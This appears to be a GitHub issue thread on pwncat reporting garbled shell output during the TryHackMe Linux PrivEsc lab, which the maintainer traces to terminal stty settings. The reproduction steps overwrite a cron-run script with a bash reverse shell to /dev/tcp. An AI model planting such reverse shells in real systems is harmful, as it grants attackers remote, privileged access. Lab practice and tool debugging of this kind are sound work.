### ISSUE TITLE
Pwncat cascaded [BUG]

### ISSUE THREAD

**Issue by SiopySh** [calebstewart/pwncat#94]
**Describe the bug**
The shell is cascaded

**Describe the target system**
Linux PrivEsc - TryHackMe : https://tryhackme.com/room/linuxprivesc

**To Reproduce**
1. Connect to SSH on THM VM
2. ```nano /usr/local/bin/overwrite.sh```
3. Replace the content with 
```
#!/bin/bash
bash -i >& /dev/tcp/IP/1234 0>&1
````
4. ```python -m pwncat -lp 1234```

**Screenshots**

![image](https://user-images.githubusercontent.com/37114131/115877415-b3bbe180-a447-11eb-824e-5454acf6d355.png)

**Comment by calebstewart** [comment]
This is an issue with `stty` settings (specifically, it's likely missing the `onlcr` flag). There may be other issues related to the current `stty` configuration, since I don't see any echoing either. Does `stty sane` fix this?

**Comment by SiopySh** [comment]
> This is an issue with `stty` settings (specifically, it's likely missing the `onlcr` flag). There may be other issues related to the current `stty` configuration, since I don't see any echoing either. Does `stty sane` fix this?

It works ! Thank you
